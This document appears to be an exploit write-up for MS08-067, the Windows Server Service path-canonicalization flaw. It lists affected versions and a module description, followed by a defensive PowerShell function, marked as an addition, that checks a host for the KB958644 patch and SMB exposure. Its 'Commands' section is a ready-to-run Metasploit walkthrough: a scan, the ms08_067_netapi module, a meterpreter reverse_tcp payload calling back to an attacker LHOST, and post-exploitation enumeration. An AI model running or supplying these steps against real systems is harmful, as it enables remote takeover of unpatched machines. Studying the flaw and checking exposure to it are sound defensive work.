MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Timeline :

Milw0rm PoC provided by Stephen Lawler on 2008-10-23
Metasploit PoC provided by hdm on 2009-10-28
Microsoft patch "KB958644" provided on 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. The module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of the module; full support for NX bypass on 2003, along with other platforms, is still in development.

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig
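A defender-side check for the same hosts, added here and not part of the original page or of the Metasploit module: a PowerShell function that reports whether the KB958644 fix is installed and whether the Server service (the path the description above says the flaw is reached through) is running and listening on SMB. It assumes PowerShell 2.0 or later with Get-HotFix available, and that the Server service is registered under its usual name LanmanServer.

```powershell
# Added example (not from the original page): on-host exposure check for MS08-067.
# Assumptions: Get-HotFix is available (PowerShell 2.0+), the fix is registered
# under the KB number listed on the page (KB958644), and the Server service
# runs under its usual service name "LanmanServer".
function Test-MS08067Exposure {
    [CmdletBinding()]
    param()

    # KB958644 is the Microsoft patch referenced in the timeline above.
    $kb = 'KB958644'
    $patch = Get-HotFix -Id $kb -ErrorAction SilentlyContinue
    $patched = ($null -ne $patch)
    $installedOn = $null
    if ($patched) { $installedOn = $patch.InstalledOn }

    # The vulnerable NetAPI32 code is reached through the Server service, so an
    # unpatched host with that service running is the exposed case.
    $srv = Get-Service -Name 'LanmanServer' -ErrorAction SilentlyContinue
    $serverRunning = ($null -ne $srv) -and ($srv.Status -eq 'Running')
    $serviceState = 'NotFound'
    if ($srv) { $serviceState = $srv.Status.ToString() }

    # Reaching the flaw requires SMB, so also report whether TCP/445 is listening.
    $smbListening = $false
    try {
        $props = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()
        $listeners = $props.GetActiveTcpListeners()
        $smbListening = (@($listeners | Where-Object { $_.Port -eq 445 }).Count -gt 0)
    } catch { }

    $status = 'Unpatched (Server service stopped)'
    if ($patched) { $status = 'Patched' }
    elseif ($serverRunning -and $smbListening) { $status = 'Exposed' }
    elseif ($serverRunning) { $status = 'Unpatched (SMB not listening)' }

    New-Object PSObject -Property @{
        ComputerName   = $env:COMPUTERNAME
        OSVersion      = [System.Environment]::OSVersion.Version.ToString()
        Patch          = $kb
        PatchInstalled = $patched
        InstalledOn    = $installedOn
        ServerService  = $serviceState
        SmbListening   = $smbListening
        Status         = $status
    }
}

Test-MS08067Exposure | Format-List
```

A host reporting "Exposed" matches the tested configuration on this page (Windows XP SP3 before KB958644); "Patched" means the fix from the timeline is present regardless of service state.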